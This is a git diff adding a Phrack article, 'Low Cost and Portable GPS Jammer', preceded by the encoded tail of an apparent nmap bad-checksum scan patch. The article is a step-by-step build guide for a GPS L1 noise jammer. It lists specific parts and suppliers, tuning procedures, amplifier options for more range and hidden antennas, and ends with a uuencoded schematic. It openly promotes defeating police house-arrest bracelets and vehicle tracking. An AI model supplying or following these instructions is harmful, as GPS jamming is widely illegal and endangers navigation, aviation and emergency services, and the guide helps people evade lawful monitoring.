+M.C`Q(#(P,#(**RLK(&YM87`M,RXQ,$%,4$A!-"UB860O=&%R9V5T<RYC8PE4
+M:'4@1&5C(#$R(#`W.C4R.C0U(#(P,#(*0$`@+3(P."PW("LR,#@L-R!`0`H@
+M"2`@("`H*"IP:6YG='EP92`F(%!)3D=465!%7U1#4"D@?'P@"B`)("`@("!O
+M+G-Y;G-C86X@?'P@;RYF:6YS8V%N('Q\(&\N>&UA<W-C86X@?'P@;RYN=6QL
+M<V-A;B!\?"`*(`D@("`@(&\N:7!P<F]T<V-A;B!\?"!O+FUA:6UO;G-C86X@
+M?'P@;RYI9&QE<V-A;B!\?"!O+F%C:W-C86X@?'P@"BT)("`@("!O+G5D<'-C
+M86X@?'P@;RYO<W-C86X@?'P@;RYW:6YD;W=S8V%N*2D@>PHK"2`@("`@;RYU
+M9'!S8V%N('Q\(&\N;W-S8V%N('Q\(&\N=VEN9&]W<V-A;B!\?"!O+F)A9'1C
+M<'-C86X@?'P@;RYB861U9'!S8V%N*2D@>PH@"2`@<W1R=6-T('-O8VMA9&1R
+M7VEN("IS:6X@/2`H<W1R=6-T('-O8VMA9&1R7VEN("HI("9S<SL*(`D@('-S
+M;&5N(#T@<VEZ96]F*"IS:6XI.PH@"2`@<VEN+3YS:6Y?9F%M:6QY(#T@049?
+M24Y%5#L*9&EF9B`M=7).8B!N;6%P+3,N,3!!3%!(030O=&-P:7`N8V,@;FUA
+M<"TS+C$P04Q02$$T+6)A9"]T8W!I<"YC8PHM+2T@;FUA<"TS+C$P04Q02$$T
+M+W1C<&EP+F-C"4UO;B!.;W8@,3$@,3@Z,#,Z-#4@,C`P,@HK*RL@;FUA<"TS
+M+C$P04Q02$$T+6)A9"]T8W!I<"YC8PE4:'4@1&5C(#$R(#`W.C4U.C,P(#(P
+M,#(*0$`@+3(R-BPV("LR,C8L,3$@0$`*('-U;2`@/2`H<W5M(#X^(#$V*2`K
+M("AS=6T@)B`P>&9F9F8I.R`@("`O*B!A9&0@:&EG:"TQ-B!T;R!L;W<M,38@
+M*B\*('-U;2`K/2`H<W5M(#X^(#$V*3L@("`@("`@("`@("`@("`@("`@("`O
+M*B!A9&0@8V%R<GD@*B\*(&%N<W=E<B`]('YS=6T[("`@("`@("`@("\J(&]N
+M97,M8V]M<&QE;65N="P@=&AE;B!T<G5N8V%T92!T;R`Q-B!B:71S("HO"BL*
+M*R\J($)A9"!#:&5C:W-U;2!38V%N<SH@5V4@;75S="!B92!S=7)E('1H870@
+M=&AE(&-H96-K<W5M(&ES(')A;F1O;2!A;F0@8G)O:V5N("HO"BMI9B`H(&\N
+M8F%D8VMS=6T@/3T@,2`I"BL@(&%N<W=E<B`]("AA;G-W97(M,2D@)B!G971?
+I<F%N9&]M7W5S:&]R="@I.PHK"B!R971U<FXH86YS=V5R*3L*('T*(`H`
+`
+end
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack60/13.txt b/phrack60/13.txt
new file mode 100644
index 0000000..8abe1d4
--- /dev/null
+++ b/phrack60/13.txt
@@ -0,0 +1,681 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x0d of 0x10
+
+|=-----------------=[ Low Cost and Portable GPS Jammer ]=----------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[ anonymous <p60_0d@author.phrack.org ]=---------------=|
+
+--[ Contents
+
+  1 - Project Overview
+
+  2 - Why?
+
+  3 - Technical Description
+    3.1 - Phase Locked Loop
+    3.2 - Noise Generator
+    3.3 - RF Amplifiers
+    3.4 - Voltage Regulation
+    3.5 - Antenna
+
+  4 - Construction Notes
+    4.1 - Component Purchasing
+    4.2 - Layout
+
+  5 - Operation
+
+  6 - References
+
+  Appendix A: Links to Datasheets
+
+  Appendix B: Schematic Diagram - gps_jammer.ps.gz (uuencoded)
+
+
+--[ 1 - Project Overview
+ 
+  A low cost device to temporarily disable the reception of the civilian
+course acquisition (C/A) code used for the standard positioning service
+(SPS)[1] on the Global Positioning System (GPS/NAVSTAR) L1 frequency of
+1575.42 MHz.
+
+  This is accomplished by transmitting a narrowband Gaussian noise signal,
+with a deviation of +/- 1.023 MHz, on the L1 GPS frequency itself.  This
+technique is a little more complicated than a simple continuous wave (CW)
+jammer, but tends to be more effective (i.e. harder to filter) against
+spread spectrum based radio receivers.
+
+  This device will have no effect on the precise positioning service (PPS)
+which is transmitted on the GPS L2 frequency of 1227.6 MHz and little
+effect on the P-code which is also carried on the L1 frequency.  There may
+be a problem if your particular GPS receiver needs to acquire the P(Y)-code
+through the C/A-code before proper operation.
+
+  This device will also not work against the new upcoming GPS L5 frequency
+of 1176.45 MHz or the Russian GLONASS or European Galileo systems.  It can
+be adapted to jam the new civilian C/A-code signal which is going to also
+be transmitted on the GPS L2 frequency.
+
+  That said, it will work against the majority of consumer/OEM GPS
+receivers, provided they are not setup in any advanced anti-jam
+configuration.
+
+---[ 2 - Why?
+
+  The onslaught of cheap GPS based navigation (or hidden tracking devices)
+over the past few years has made it necessary for the typical citizen to
+take up the fine art of electronic warfare.
+
+  Several companies[2] now sell "hidden" GPS based tracking devices which
+mount inside or underneath your vehicle.  Some transmit the coordinates,
+via cellular phone, of your vehicle's present and/or past locations for
+weeks at a time without battery changes or court orders!
+
+  Vehicle rental companies have been known to use GPS tracking devices to
+verify you don't speed or abuse their rental vehicles.  The unsuspecting
+renter is often faced with these hidden abuse "fees" after returning the
+rental vehicle.
+
+  Law enforcement agencies are dumb enough to keep track of house arrest
+prisoners with simple GPS based tracking bracelets[3].  Some even use GPS
+for automatic vehicle location (AVL) on their squad cars to allow the
+dispatchers to send in the closest unit to a particular call or to know an
+officer's location in case of an emergency situation where they can't use
+their radio.
+
+  Cellular phone companies, trucking companies, private investigators,
+toll-roads, aircraft, those "protect your child" systems and many more
+services are all fully involved with the use of GPS based tracking.  The
+problem is, do you really want everyone to know where you are?
+
+---[ 3 - Technical Description
+
+  This will be a brief description of each of the major sections which
+compromise the entire jammer device.  Refer to the included schematic
+diagram (Appendix B) as you read along.  You should also refer to the
+component's datasheets for even more detailed information.
+
+---[ 3.1 - Phase Locked Loop
+
+  The jammer's main oscillator components consist of a Motorola MC145151
+phase-locked loop (PLL) frequency synthesizer chip, a Micronetics M3500-
+1324S voltage controlled oscillator (VCO) module and a Fijitsu MB506 divide
+-by-256 prescaler chip.
+
+  The VCO feeds a portion of its radio frequency (RF) output signal into
+the prescaler chip, where it is divided by 256.  A 1575 MHz signal would be
+turned into a 6.15234375 MHz signal.  This is then fed into one side of the
+PLL chip.
+
+  The other side of the PLL is fed with a reference frequency which is
+derived from a 10 MHz quartz crystal.  This crystal reference frequency is
+divided down 512 times by the PLL to reach 19531.25 Hz.  The 6.15234375
+MHz prescaler output frequency is also further divided down 315 times by
+the PLL chip for a final frequency of 19531.25 Hz.  This will be the new
+PLL internal reference frequency.  That big bad 1575 MHz microwave signal
+now looks like a simple audio frequency to the PLL chip and the supporting
+components.
+
+  The PLL chip internally compares the phase of the 19531.25 Hz VCO side
+signal to the phase of the 19531.25 Hz crystal side signal.  The PLL chip
+outputs high or low voltage pulses depending on whether the crystal signal
+is leading or lagging in phase with the VCO signal.  These pulses are then
+filtered and dampened into a pure DC control signal via a simple passive
+loop filter.  This cleaned up signal is then connected to the VCO's voltage
+tune control input.
+
+  When everything is working properly, the VCO's output frequency is locked
+to whatever frequency you programmed into the PLL chip, 1575 MHz in this
+case.  It will stay on that frequency even through dramatic temperature
+changes, a problem that a non-PLL VCO would have.  If the PLL is not
+working properly, the red "PLL Unlock" LED will be lit.
+
+  Due to a quirk with using low cost, easy to obtain components, you'll
+need to tweak two loading capacitors on the reference crystal.  This is
+unusual, but necessary to move the signal from the default 1575 MHz to
+the more appropriate 1575.42 MHz (+/- a few hundred Hertz).  This is a very
+important and delicate procedure, and you'll need a frequency counter to
+accomplish it.
+
+---[ 3.2 - Noise Generator
+
+  The actual noise generator of the jammer is very simple.  A 6.8 Volt
+Zener diode is first biased, buffered and amplified by a single 2N3904
+transistor.  This single Zener diode is capable of generating broadband
+noise signals from audio frequencies up to over 100 MHz.  We then filter
+this noise signal down to something more practical and something which the
+VCO module can actually respond too.  This is done via the LM386 audio
+amplifier chip.  The LM386 both amplifies and low pass filters the final
+noise signal.  The final LM386 output signal will have enough overhead if
+you need to adapt it for a wideband noise jammer.
+
+  This low frequency noise signal is fed, via a 100 Ohm potentiometer, to
+a simple resistor/capacitor network where it's mixed with the VCO voltage
+tune control signal (described above).  The single 1N4148 diode is to
+prevent any negative voltage pulses from reaching the VCO.
+
+  This mixing results in a new "noisy" voltage tune control signal feeding
+the VCO.  The resulting RF signal looks like random noise dancing around
+the center 1575.42 MHz RF carrier.  You'll need to set the deviation of
+this noise to approximately +/- 1.023 MHz from the 1575.42 MHz RF carrier.
+Access to a spectrum analyzer is required to do this properly, or you can
+use an oscilloscope and the included test point voltages to get an
+approximate setup.
+
+---[ 3.3 - RF Amplifiers
+
+  The VCO's +7 dBm (5 milliwatts) RF output is first slightly attenuated
+(4 dB) and tapped for the MB506 prescaler input.  It then passes through to
+the RF amplifier stages and band pass filter.
+
+  The first RF amplifier is a Sirenza Microdevices SGA-6289.  It provides
+about 13 dB of gain to overcome the losses from the resistive attenuation
+pad.  It also shows a good 50 Ohm termination for the VCO RF output and
+even helps to drive the final RF amplifier.
+
+  The GPS band pass filter is a 2-pole Toko 4DFA-1575B-12 ceramic
+dielectric filter from Digi-Key[4], part number TKS2609CT-ND.  This part is
+optional, but helps clean up the RF spectrum before further amplification.
+The filter's insertion loss is around 2 dB.
+
+  The final RF amplifier is a WJ Communications AH102.  It provides another
+13 dB of gain, with a higher P1dB compression point of around +27 dBm (500
+mW).  The AH102 draws the most current of any part, and is not really
+necessary if you're aiming for a low range, low current, battery operated
+device.
+
+---[ 3.4 - Voltage Regulation
+
+  Voltage input regulation and filtering is done using standard voltage
+regulator ICs.  A LM2940CT-12 12 Volt, 1 Amp low dropout voltage regulator
+is used to regulate the main 12 Volt power line.  Standard 78xx series
+regulators are used from there on to provide both the 9 and 5 Volt lines.
+A simple diode/fuse polarity protection scheme is also provided on the
+battery input.  The use of an automatic reset fuse is highly recommended.
+
+  You can power the jammer off a common 12 Volt rechargeable battery.
+The 12 Volt, 4.5 Amp-hour, lead-acid battery from Radio Shack[5], part
+number 23-289, is a good choice.  Old car batteries, strings of 6 Volt
+lantern batteries or even solar panels will also work.  Current draw for
+the completed jammer will be around 300 milliamps.
+
+---[ 3.5 - Antenna
+
+  A radiating antenna is not shown in the schematic diagram and one will
+need to be purchased or constructed for proper operation.  There are
+numerous commercial GPS receiving antennas which will work fine for this
+low power transmitting application.  Some of the best pre-made or easily
+assembled microwave antennas can be purchased directly from Ramsey
+Electronics[6].
+
+  The Ramsey DA25 broadband discone antenna is recommended for omni-
+directional (transmit in a circle) radiating applications.  The LPY2 log
+periodic Yagi antenna can be used for directional (transmit in a straight
+line) radiating applications.  Using a directional antenna will give you a
+slight increase in overall transmitted RF power, which increases the
+jammer's range, and can also be used to shield your own GPS receiver from
+being jammed (i.e. point it at the enemy).
+
+  Dielectric GPS patch antenna elements may also be purchased from Digi-
+Key.  Toko DAK series elements, Digi-Key part number TK5150-ND, are perfect
+for surface mounting directly to the circuit board.  They will require a
+plastic radome to slightly lower their resonant frequency.  The small
+antenna element size is also perfect for hidden or portable operations.
+
+---[ 4 - Construction Notes
+
+  Unfortunately, proper jammer construction will require fairly advanced
+engineering skills.  Prior knowledge of high frequency microwave circuits
+and printed circuit board (PCB) design is required.  A good start for the
+beginner is by reading the "UHF/Microwave Handbook" and "The ARRL Handbook"
+both published by the Amateur Radio Relay League (ARRL)[7].  Access to
+fundamental RF test equipment (oscilloscope, frequency counter, spectrum
+analyzer, loads, attenuators, etc.) is also required.
+
+---[ 4.1 - Component Purchasing
+
+  The main VCO module and RF amplifiers can be purchased from Richardson
+Electronics[8].  Part number M3500C-1324S for the VCO module and part
+numbers SGA-6289 and AH102 for the RF amplifiers.  Equivalent VCO and RF
+amplifiers can be purchased from companies such as Mini-Circuits[9] or
+Synergy Microwave[10].  Slight component changes may be required if using
+alternate components to take into account different operating voltages and
+input/output RF power requirements.  The PLL loop filter may also need
+tweaking if you use a different VCO module.
+
+  The MC145151 PLL synthesizer chip can be purchased from Digi-Key.  There
+are several pin packages available (leaded or surface mount), choose the
+one suitable for your application.  The small 28-SOIC surface mount package
+is part number MC145151DW2-ND.  You may also be able to salvage MC145151
+chips from older CB radios or older C-band satellite receivers (the kind
+that where tuned via DIP switches).
+
+  Digi-Key also handles an equivalent prescaler IC, the NEC UPG1507GV, part
+number UPB1507GV-ND.  This is an exact replacement for the Fijitsu MB506,
+but the main drawback to the UPG1507GV is that it is in a 8-SSOP package
+(i.e. very small) and is fairly difficult to work with using standard
+soldering tools.
+
+  The 10 MHz crystal is also available from Digi-Key, part number
+300-6121-1-ND.  Other miscellaneous components may also be purchased from
+Digi-Key (capacitors, resistors, voltage regulators, inductors,
+diodes, transistors, LM386, project box, RF connectors, etc.) as their
+prices are the most competitive and their service is outstanding.
+
+---[ 4.2 - Layout
+
+  No PCB pattern is available, you'll have to layout the project by hand
+using felt-tip markers, drafting tape, dry-etch or iron-on transfers.  You
+should make your own PCB pattern to fit your application specifically.
+
+  The PCB layout isn't that difficult or challenging, but will require
+prior experience and patience.  Using all surface mount components and good
+board layout practices will reduce the jammer's physical size and cost
+tremendously.
+
+  The use of high frequency, double sided copper clad laminate is essential
+for properly working microwave circuits.  GIL Technologies[11] GML1000
+(2-side, 1 oz., 0.030") is a good choice but standard FR-4 laminate will
+work in a pinch.  You can purchase 6" x 6" FR-4 (2-side, 1 oz., 0.030")
+laminate from Digi-Key, part number PC45-S-ND.
+
+  A 50 Ohm micro stripline on 0.030" GML1000 PCB laminate will be about 70
+mils (1.8 mm) wide and on FR-4 it will be about 55 mils (1.5 mm) wide.  Be
+sure to keep any micro stripline carrying RF signals short, straight and
+perpendicular to any DC bias line or any other micro stripline it has to
+cross.
+  
+  The 2 mm wide line in the dry-etch transfer package from Radio Shack,
+part number 276-1490, will work O.K. on both materials for creating
+homebrew micro striplines which are close enough to 50 Ohms.
+
+  The two RF amplifiers, band pass filter, VCO and prescaler PCB patterns
+will all require numerous ground vias connecting the top and bottom ground
+planes.  These help prevent ground loops and instability (oscillations)
+from disrupting proper circuit operation.  In the case of the AH102, they
+even provide some heat sinking to allow cooler operation of the final RF
+amplifier.
+
+  Any resistors, capacitors or inductors used in the RF sections should be
+in a 0603, 0805 or 1206 size surface mount package.  Leaded components will
+not work at this high of a frequency.  Be sure your choice of surface mount
+inductors can handle the current when used as part of the DC bias on the
+RF amplifiers.  The ferrite bead shown in the schematic can be any salvaged
+ferrite bead.  The inductor assortment package at Radio Shack, part number
+273-1601 should have a couple of them in it.
+
+--[ 5 - Operation
+
+  Once the jammer is operational, you can practice testing it by monitoring
+the signal on a common consumer GPS receiver or high quality communications
+receiver.  A GPS receiver close to the jammer will not be able to acquire
+C/A-code lock and any operating GPS in the jammer's radiation pattern will
+lose C/A-code lock.  Higher quality GPS receivers tend to be less
+susceptible to low power jamming, so you'll need to be in the antenna's
+near-field radiation pattern (i.e. close) for it to work.
+
+  Any obstructions near the jammer's own antenna (trees, houses, hills,
+walls, etc.) will decrease the jamming range.  The best placement is where
+the jammer's antenna is line-of-sight to the antenna of the GPS receiver
+you're trying to jam.  Real world results will vary drastically, but you
+should be able to obtain a jam radius of a few hundred feet even in heavily
+obstructed areas with the higher power (AH102) option and a simple antenna.
+
+  You can even practice counter-jamming methods to protect yourself against
+hostile or accidental GPS jamming.  Try to shield your GPS receiver from
+the interference source by placing your body, trees, hills, rocks or other
+obstructions in-between your position and the interference.  More advanced
+methods involve using directional or steerable phased-array antennas on
+your GPS receiver (pointed skyward) to nullify any ground based
+interference.
+
+--[ 6 - References
+
+[1] Standard Positioning Service (SPS) Signal Specification
+    http://www.spacecom.af.mil/usspace/gps_support/gps_documentation.htm
+
+[2] GPS-Web
+    http://www.gps-web.com
+
+    Travel Eyes 2
+    http://www.spyyard.com/details_traveleyes2.htm
+
+[3] VeriTrack
+    http://www.veridian.com/offerings/suboffering.asp?offeringID=472
+
+    iSECUREtrac
+    http://www.isecuretrac.com
+
+    Pro Tech Monitoring
+    http://www.ptm.com
+
+[4] Digi-Key
+    http://www.digikey.com
+
+[5] Radio Shack
+    http://www.radioshack.com
+
+[6] Ramsey Electronics
+    http://www.ramseyelectronics.com
+
+[7] Amateur Radio Relay League
+    http://www.arrl.org
+
+[8] Richardson Electronics
+    http://www.rell.com
+
+[9] Mini-Circuits
+    http://www.minicircuits.com
+
+[10] Synergy Microwave
+     http://www.synergymwave.com
+
+[11] GIL Technologies
+     http://www.gilam.com
+
+[12] Xcircuit
+     http://xcircuit.ece.jhu.edu
+
+--[ Appendix A: Links to Datasheets
+
+Alternate component manufactures may be substituted in most cases.
+
+* Fairchild Semiconductor 2N3904 NPN Transistor
+  http://www.fairchildsemi.com/ds/2N/2N3904.pdf
+
+* Micronetics M3500-1324S VCO
+  http://www.micronetics.com/pdf/vco1324.pdf
+
+* Motorola MC145151 PLL Frequency Synthesizer
+  http://e-www.motorola.com/brdata/PDFDB/docs/MC145151-2.pdf
+
+* National LM2940-12 Voltage Regulator
+  http://www.national.com/ds/LM/LM2940.pdf
+
+* National LM386 Audio Amplifier
+  http://www.national.com/ds/LM/LM386.pdf
+
+* National LM78L05 Voltage Regulator
+  http://www.national.com/ds/LM/LM78L05.pdf
+
+* NEC UPB1506/07GV Prescaler
+  http://www.cel.com/pdf/datasheets/upb1506.pdf
+
+* Sirenza Microdevices SGA-6289 RF Amplifier
+  http://www.sirenza.com/pdf/datasheets/sga/89/sga-6289.pdf
+
+* STMicroelectronics 78M09 Voltage Regulator
+  http://eu.st.com/stonline/books/pdf/docs/2146.pdf
+
+* Toko DAK1575MS50T Dielectric Antenna
+  http://www.toko.com/passives/antennas/pdf/DAK1575MS50Tws.pdf
+
+* Toko 4DFA-1575B-12 Dielectric Band Pass Filter
+  http://www.toko.com/passives/filters/dielectric/4dfa.html
+
+* WJ Communications AH102 RF Amplifier
+  http://www.wj.com/pdf/AH102.pdf
+
+--[ Appendix B: Schematic Diagram - gps_jammer.ps.gz (uuencoded)
+
+  Below is the schematic diagram (gps_jammer.ps) in an uuencoded gzipped
+PostScript file.  This is the native Xcircuit[12] format and is used for
+ease of viewing, printing and modification.
+
+<++> ./gps_jammer.ps.gz.uue
+
+begin 644 gps_jammer.ps.gz
+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
